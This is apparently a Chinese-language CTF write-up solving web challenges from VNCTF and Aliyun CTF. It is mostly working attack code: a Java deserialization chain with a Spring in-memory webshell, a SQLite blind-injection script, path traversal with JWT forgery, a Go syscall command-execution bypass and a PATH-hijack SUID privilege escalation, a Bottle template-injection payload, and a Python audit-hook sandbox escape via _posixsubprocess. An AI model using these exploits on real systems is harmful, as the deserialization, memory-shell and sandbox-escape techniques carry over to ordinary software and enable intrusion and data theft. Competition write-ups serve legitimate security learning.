VNCTF

5道web解出了4道

javaGuide

/deser路由可以反序列化,有spring bootfastjson 1.2.83的依赖。

反序列化有黑名单:

protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
    String className = desc.getName();
    String[] denyClasses = {"com.sun.org.apache.xalan.internal.xsltc.trax", "javax.management", "com.fasterxml.jackson"};
    int length = denyClasses.length;
    for (String denyClass : denyClasses) {
        if (className.startsWith(denyClass)) {
            throw new InvalidClassException("Unauthorized deserialization attempt", className);
        }
    }
    return super.resolveClass(desc);
}

可以用signedObject二次反序列化绕过

利用链:

EventListenerList.readobject()  ->
    JSONArray.toString()  ->
        SignedObject.getObject()  ->
            EventListenerList.readobject()  ->
                JSONArray.toString()  ->
                    Templates.getOutputProperties()

fastjson1.2.83使用引用绕过。

Templates templates = new TemplatesImpl();
setFieldValue(templates,"_bytecodes",new byte[][]{getEvilClass()});
setFieldValue(templates,"_class",null);
setFieldValue(templates,"_name","asd");

JSONArray jsonArray1 = new JSONArray();
jsonArray1.add(templates);

EventListenerList list1 = new EventListenerList();
UndoManager manager1 = new UndoManager();
Vector vector1 = (Vector) getFieldValue(manager1,"edits");
vector1.add(jsonArray1);
setFieldValue(list1, "listenerList", new Object[]{String.class, manager1});

HashMap hashMap1 = new HashMap();
hashMap1.put(templates, list1);

KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();
SignedObject signedObject = new SignedObject(hashMap1, kp.getPrivate(), Signature.getInstance("DSA"));

JSONArray jsonArray2 = new JSONArray();
jsonArray2.add(signedObject);

EventListenerList list2 = new EventListenerList();
UndoManager manager2 = new UndoManager();
Vector vector2 = (Vector) getFieldValue(manager2,"edits");
vector2.add(jsonArray2);
setFieldValue(list2, "listenerList", new Object[]{String.class, manager2});

HashMap hashMap2 = new HashMap();
hashMap2.put(signedObject,list2);

byte[] code = ser(hashMap2);
System.out.println(Base64.getEncoder().encodeToString(code));

容器不出网,可以打一个spring的内存马,我这里用的是Spring Interceptor内存马

注入器(通过Template.defineClass加载)

package com.example.javaguide;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;

import java.lang.reflect.Field;
import java.util.List;

public class Evil extends AbstractTranslet {
    public Evil() throws Exception{
        String encodedstr = "";
        byte[] classBytes = java.util.Base64.getDecoder().decode(encodedstr);

        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
        org.springframework.web.context.WebApplicationContext context = null;
        try {
            org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
            Class cla = requestAttributes.getClass();
            java.lang.reflect.Method me = cla.getDeclaredMethod("getRequest", new Class[]{});
            me.setAccessible(true);
            javax.servlet.http.HttpServletRequest httprequest = (javax.servlet.http.HttpServletRequest) me.invoke(requestAttributes, new Object[]{});
            javax.servlet.http.HttpSession session = httprequest.getSession();
            javax.servlet.ServletContext servletContext = session.getServletContext();
            context = org.springframework.web.context.support.WebApplicationContextUtils.getWebApplicationContext(servletContext);
        } catch (Exception e) {
            e.printStackTrace();
        }

        java.lang.reflect.Method defineclass = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
        defineclass.setAccessible(true);

        HandlerInterceptor memShellInterceptor = null;

        try {
            memShellInterceptor = (HandlerInterceptor) Class.forName("com.example.javaguide.EvilInterceptor").newInstance();
        } catch (Exception e){
            memShellInterceptor = (HandlerInterceptor) ((Class) defineclass.invoke(classLoader, classBytes, 0, classBytes.length)).newInstance();
        }
        AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        List<Object> adaptedInterceptors = (List<Object>) field.get(abstractHandlerMapping);
        adaptedInterceptors.add(memShellInterceptor);
        System.out.println("interceptor injected successfully");
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

其中encodedstr为恶意Interceptor类的字节码base64

恶意Interceptor类:

package com.example.javaguide;

import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class EvilInterceptor implements HandlerInterceptor {
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        try {
            Process exec = Runtime.getRuntime().exec("cat /flag");
            java.io.InputStream inputStream = exec.getInputStream();
            javax.servlet.ServletOutputStream outputStream = response.getOutputStream();
            byte[] buf = new byte[8192];
            int length;
            while ((length = inputStream.read(buf)) != -1) {
                outputStream.write(buf, 0, length);
            }
            return false;
        } catch (Exception e) {
            e.printStackTrace();
        }
        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {

    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {

    }
}

奶龙回家

返回包server为Werkzeug/3.1.3 Python/3.10.16,猜测为flask框架,凭经验来说一般搭配mysql或sqlite

randomblob(1000000000)可以延时,确定为sqlite数据库。

通过测试猜测sql语句如下:

select * from users where username = '{username}' and password = '{password}';

服务器应该还有一层检测,在flask路由处也会判断username和password是否正确。这就导致构造的万能密码无法登陆,但确可以盲注,当然也有可能时sql语句我猜错了。

不过,至少以下payload可以时间盲注:

{
    "username" : "asdasda'/**/or/**/(length(username)>0)/**/or/**/randomblob(1000000000)>",
    "password" : "/**/or/**/'zzzzzzzzzzzzzzz'>'"
}

转换成sql语句如下(大概):

select * from users where username = 'asdasda'/**/or/**/(length(username)>0)/**/or/**/randomblob(1000000000)>' and password = '/**/or/**/'zzzzzzzzzzzzzzz'>''

注释、空格以及等号被过滤了。

length(username)>0成立时由于or的短路特性,后面表达式不会运行,也就不会延时。

exp:

import requests

url = 'http://'
cha = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
# cha = 'abcdefghijklmnopqrstuvwxyz'

payload = "asdasda'/**/or/**/((substr(password,{},1)<>'{}'))/**/or/**/randomblob(1000000000)>"

# password = 'woaipangmao114514'
password = ''

while len(password) < 17:
    signal = True
    for c in cha:
        json = {
            "username" : payload.format(str(len(password) + 1), c),
            "password" : "/**/or/**/'zzzzzzzzzzzzzzz'>'"
        }
        print(password + c, end='\r')
        try:
            res = requests.post(url=url + '/login', json=json, timeout=1)
        except KeyboardInterrupt as e:
            print(password)
            exit()
        except:
            password = password + c
            signal = False
            break
    if signal:
        password = password + '_'

print(password)

账密:nailong:woaipangmao114514

Gin

权限使用jwt验证,jwt的key生成代码:

func GenerateKey() string {
	rand.Seed(config.Year())
	randomNumber := rand.Intn(1000)
	key := fmt.Sprintf("%03d%s", randomNumber, config.Key())
	return key
}

虽然用了随机数,但只要种子也就是config.Year()config.Key()的值是固定的则key也是固定的。

附件里的config目录里的key.go内容为空,需要从远程靶机获取。

/download路由代码如下:

func Download(c *gin.Context) {
	filename := c.DefaultQuery("filename", "")
	if filename == "" {
		response.Response(c, http.StatusBadRequest, 400, nil, "Filename is required")
	}
	basepath := "./uploads"
	filepath, _ := url.JoinPath(basepath, filename)
	if _, err := os.Stat(filepath); os.IsNotExist(err) {
		response.Response(c, http.StatusBadRequest, 404, nil, "File not found")
	}
	c.Header("Content-Disposition", "attachment; filename="+filename)
	c.File(filepath)
}

存在目录穿越,可以用来下载任意文件。

下载key.go:/download?filename=../config/key.go,内容如下:

package config

func Key() string {
	return "r00t32l"
}
func Year() int64 {
	return 2025
}

现在可以伪造admin的token:

package main

import (
	"fmt"
	"math/rand"
	"time"

	"github.com/golang-jwt/jwt/v4"
)

func main() {
	token, err := GenerateToken("admin")
	if err != nil {
		fmt.Println("error")
	}
	fmt.Println(token)
}

func Key() string {
	return "r00t32l"
}
func Year() int64 {
	return 2025
}

type JWTClaims struct {
	Username string `json:"username"`
	jwt.RegisteredClaims
}

func GenerateKey() string {
	rand.Seed(Year())
	randomNumber := rand.Intn(1000)
	key := fmt.Sprintf("%03d%s", randomNumber, Key())
	return key
}

func GenerateToken(username string) (string, error) {
	key := GenerateKey()
	claims := JWTClaims{
		Username: username,
		RegisteredClaims: jwt.RegisteredClaims{
			ExpiresAt: jwt.NewNumericDate(time.Now().Add(24 * time.Hour)),
			IssuedAt:  jwt.NewNumericDate(time.Now()),
			Issuer:    "Mash1r0",
			Subject:   "user token",
		},
	}

	token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)

	signedToken, err := token.SignedString([]byte(key))
	if err != nil {
		return "", fmt.Errorf("生成 token 时出错: %v", err)
	}
	return signedToken, nil
}

func ParseToken(tokenString string) (*JWTClaims, error) {
	key := GenerateKey()
	token, err := jwt.ParseWithClaims(tokenString, &JWTClaims{}, func(token *jwt.Token) (interface{}, error) {
		return []byte(key), nil
	})

	if err != nil {
		return nil, fmt.Errorf("解析 token 时出错: %v", err)
	}

	if claims, ok := token.Claims.(*JWTClaims); ok && token.Valid {
		return claims, nil
	} else {
		return nil, fmt.Errorf("无效的 token")
	}
}

/eval路由可以执行go代码,但不允许import os/exec库。可以用syscall绕过,这种命令执行较为底层。

package main

import (
	"fmt"
	"os"
	"syscall"
)

func main() {
	// 定义要执行的命令和参数
	cmd := "/bin/sh" // 命令路径
	args := []string{
		"sh", // 命令名
		"-c", // 参数
		"ls -al /",  // 参数
	} // 参数列表

	// 创建子进程
	attr := &syscall.ProcAttr{
		Files: []uintptr{
			uintptr(syscall.Stdin),
			uintptr(syscall.Stdout),
			uintptr(syscall.Stderr),
		},
		Env: os.Environ(), // 继承当前环境变量
	}

	// ForkExec 的参数需要将 args 转换为字符串数组
	argv := make([]string, len(args)+1)
	copy(argv, args)
	argv[len(args)] = "" // 以空字符串结尾

	// 创建子进程
	pid, err := syscall.ForkExec(cmd, argv, attr)
	if err != nil {
		fmt.Printf("ForkExec failed: %v\n", err)
		return
	}

	// 等待子进程结束
	_, err = syscall.Wait4(pid, nil, 0, nil)
	if err != nil {
		fmt.Printf("Wait4 failed: %v\n", err)
		return
	}

	fmt.Println("Command executed successfully")
}

不知道是不是非预期,这么打的话没有用到/upload路由。

flag并不在/flag里,真正的flag在/root/flag中,还需要提权。/.../Cat文件有suid权限。

下载下来放到ida里看看: 1

会调用cat命令,可以通过修改环境变量中的$PATH,让root调用恶意的cat程序

恶意cat代码如下:

#include <stdlib.h>

int main(){
    system("/usr/bin/cat /root/flag");
}

因为PATH修改了,所以expcat里需要用绝对路径,上传的话可以走/upload,不过会被ban,需要混淆一下。也可以直接base64通过/eval传进去,毕竟体积很小。

执行:

mv /tmp/expcat /tmp/cat && chmod +x /tmp/cat && export PATH=/tmp && /.../Cat

通过/eval路由执行命令是无状态的,所以export PATH=/tmp/.../Cat必须一次执行。

学生姓名登记系统

题目描述说单文件框架,大概就是python里flask,fastapi那一类的web框架。

存在SSTI,fuzz后发现{{print}}输出<built-in function print>,说明可以获取__builtins__里的内容。

猜测服务器逻辑如下:

  1. 黑名单匹配
  2. 判断每行是否超过23
  3. 尝试执行模板
  4. 若第三步报错,则将整个模板以文本输出
  5. 若第三步没报错,则将模板执行结果输出

可以通过{{globals()}}获取上下文环境。内容如下:

{'_stdout': []
 '_printlist': <built-in method extend of list object at 0x7fbe45e07e80>
 'include': functools.partial(<bound method SimpleTemplate._include of <bottle.SimpleTemplate object at 0x7fbe46a3f950>>
 {...})
 'rebase': functools.partial(<bound method SimpleTemplate._rebase of <bottle.SimpleTemplate object at 0x7fbe46a3f950>>
 {...})
 '_rebase': None
 '_str': <function SimpleTemplate.prepare.<locals>.<lambda> at 0x7fbe45ec1580>
 '_escape': <function SimpleTemplate.prepare.<locals>.<lambda> at 0x7fbe45ec1b20>
 'get': <built-in method get of dict object at 0x7fbe45e580c0>
 'setdefault': <built-in method setdefault of dict object at 0x7fbe45e580c0>
 'defined': <built-in method __contains__ of dict object at 0x7fbe45e580c0>
 '__builtins__': 

得知是bottle的SimpleTemplate模板引擎。

有每行的长度限制,需要绕过,先审计代码:

SimpleTemplate.execute函数用于执行模板:

def execute(self, _stdout, kwargs):
    env = self.defaults.copy()
    env.update(kwargs)
    env.update({
        '_stdout': _stdout,
        '_printlist': _stdout.extend,
        'include': functools.partial(self._include, env),
        'rebase': functools.partial(self._rebase, env),
        '_rebase': None,
        '_str': self._str,
        '_escape': self._escape,
        'get': env.get,
        'setdefault': env.setdefault,
        'defined': env.__contains__
    })
    exec(self.co, env)
    if env.get('_rebase'):
        subtpl, rargs = env.pop('_rebase')
        rargs['base'] = ''.join(_stdout)  #copy stdout
        del _stdout[:]  # clear stdout
        return self._include(env, subtpl, **rargs)
    return env

通过exec函数执行self.co中的字节码,除了__builtins__外,还能获取另外几个SimpleTemplate提供的方法。

字节码由SimpleTemplate.code()生成,在StplParser.translate()中使用正则匹配{{}}:

def translate(self):
    if self.offset: raise RuntimeError('Parser is a one time instance.')
    while True:
        m = self.re_split.search(self.source, pos=self.offset)
        if m:
            text = self.source[self.offset:m.start()]
            self.text_buffer.append(text)
            self.offset = m.end()
            if m.group(1):  # Escape syntax
                line, sep, _ = self.source[self.offset:].partition('\n')
                self.text_buffer.append(self.source[m.start():m.start(1)] +
                                        m.group(2) + line + sep)
                self.offset += len(line + sep)
                continue
            self.flush_text()
            self.offset += self.read_code(self.source[self.offset:],
                                            multiline=bool(m.group(4)))
        else:
            break
    self.text_buffer.append(self.source[self.offset:])
    self.flush_text()
    return ''.join(self.code_buffer)

然后StplParser.flush_text()将被{{}}包裹的内容由_printlist((%s,))包裹,拼接到python代码里。

例如{{print}}转换为_printlist((_escape(print),)),代码的注入点在元组内,可以使用海象运算符赋值,直接声明变量会报错。

{{a:=print}}
{{a(1)}}
// print(1)

这样就可以缩短每一行的长度并绕过waf了。

os.popen等函数被hook了,但subprocess没被hook。

poc:

{{b:=__builtins__}}
{{e:=b["ev""al"]}}
{{a:="__import__"}}
{{c:="('subproces"}}
{{d:="s').getout"}}
{{f:="put"}}
{{g:=e(a+c+d+f)}}
{{g("cat /flag")}}

payload需要url编码,否则会出问题

Aliyun CTF

ezoj

一个在线OJ系统,python沙箱逃逸,关键代码如下:

CODE_TEMPLATE = """
import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)


"""

@app.route("/api/submit", methods=["POST"])
def submit_code():
    try:
        data = request.get_json()
        code = data.get("code")
        problem_id = data.get("problem_id")

        if code is None or problem_id is None:
            return (
                jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}),
                400,
            )

        problem_id = str(int(problem_id))
        problem_dir = PROBLEMS_PATH / problem_id
        if not problem_dir.exists():
            return (
                jsonify(
                    {"status": "ER", "message": f"Problem ID {problem_id} not found!"}
                ),
                404,
            )

        code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py"
        with open(code_filename, "w") as code_file:
            code = CODE_TEMPLATE + code
            code_file.write(code)

        result = judge(code_filename, problem_dir)

        code_filename.unlink()

        return jsonify(result)

    except Exception as e:
        return jsonify({"status": "ER", "message": str(e)}), 500


def judge(code_filename, problem_dir):
    test_files = sorted(problem_dir.glob("*.input"))
    total_tests = len(test_files)
    passed_tests = 0

    try:
        for test_file in test_files:
            input_file = test_file
            expected_output_file = problem_dir / f"{test_file.stem}.output"

            if not expected_output_file.exists():
                continue

            case_passed = run_code(code_filename, input_file, expected_output_file)

            if case_passed:
                passed_tests += 1

        if passed_tests == total_tests:
            return {"status": "AC", "message": f"Accepted"}
        else:
            return {
                "status": "WA",
                "message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
            }
    except OJRuntimeError as e:
        return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"}
    except OJTimeLimitExceed:
        return {"status": "TLE", "message": "Time Limit Exceed"}


def run_code(code_filename, input_file, expected_output_file):
    with open(input_file, "r") as infile, open(
        expected_output_file, "r"
    ) as expected_output:
        expected_output_content = expected_output.read().strip()

        process = subprocess.Popen(
            ["python3", code_filename],
            stdin=infile,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )

        try:
            stdout, stderr = process.communicate(timeout=5)
        except subprocess.TimeoutExpired:
            process.kill()
            raise OJTimeLimitExceed

        if process.returncode != 0:
            raise OJRuntimeError(process.returncode)

        if stdout.strip() == expected_output_content:
            return True
        else:
            return False


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

沙箱audithook是白名单,只允许:import, time.sleep, builtins.input, builtins.input/result

linux下可以使用_posixsubprocess库执行命令,_posixsubprocess是CPython内部实现,audithook没有相应的事件拦截,参考:https://dummykitty.github.io/python/2023/05/30/pyjail-bypass-07-%E7%BB%95%E8%BF%87-audit-hook.html

题目不出网,白名单里有time.sleep,可能预期解是时间盲注,但这题可以布尔盲注(ACWA),效率更高一点。

flag文件名的格式为flag-<uuid4>, 获取flag文件名的exp:

import requests
import string
import time
import json

url = 'http://ip:port'
cha = '0123456789abcdef-\n'
code = '''
import _posixsubprocess
import os

problem = input()
a = int(problem.split(' ')[0])
b = int(problem.split(' ')[1])

stdout_read, stdout_write = os.pipe()

_posixsubprocess.fork_exec([b"/bin/ls","/"], [b"/bin/ls"], True, (), None, None, -1, -1, -1, stdout_write, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)

os.close(stdout_write)

res = os.read(stdout_read, 1024).decode()

if res[{}] == '{}':
    print(a + b)
else:
    print(a + b - 1)
'''.strip()

target = 'app\nbin\nboot\ndev\netc\nflag-'

while target[-1] != '}':
    for i in cha:
        # time.sleep(0.5)

        if i == '\n':
            i = '\\n'

        payload = {
            "problem_id" : "0",
            "code" : code.format(str(len(target)), i)
        }

        print((target + i).replace('\n', '\\n'), end='\r')

        try:
            sp = requests.post(url=url + '/api/submit', json=payload)
        except KeyboardInterrupt as e:
            print(target)
            exit()
        except:
            print('network error')
            print(target)
            exit()
            pass

        if json.loads(sp.text)['status'] == 'AC':
            if i == '\\n':
                target = target + '\n'
            target = target + i
            break

flag格式为aliyunctf{<uuid4>}, 盲注出flag的exp:

import requests
import string
import time
import json

url = 'http://ip:port'
cha = '0123456789abcdef-}'

code = '''
import _posixsubprocess
import os

problem = input()
a = int(problem.split(' ')[0])
b = int(problem.split(' ')[1])

stdout_read, stdout_write = os.pipe()

_posixsubprocess.fork_exec([b"/bin/cat","/<flag file name>"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, stdout_write, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)

os.close(stdout_write)

res = os.read(stdout_read, 1024).decode()

if res[{}] == '{}':
    print(a + b)
else:
    print(a + b - 1)
'''.strip()

target = 'aliyunctf{'

while target[-1] != '}':
    for i in cha:
        # time.sleep(0.5)

        if i == '\n':
            i = '\\n'

        payload = {
            "problem_id" : "0",
            "code" : code.format(str(len(target)), i)
        }

        print((target + i).replace('\n', '\\n'), end='\r')

        try:
            sp = requests.post(url=url + '/api/submit', json=payload)
        except KeyboardInterrupt as e:
            print(target)
            exit()
        except:
            print('network error')
            print(target)
            exit()
            pass

        if json.loads(sp.text)['status'] == 'AC':
            if i == '\\n':
                target = target + '\n'
            target = target + i
            break

fork_exec不能直接使用通配符*,不过用sh -c 'cat /f*'应该可以。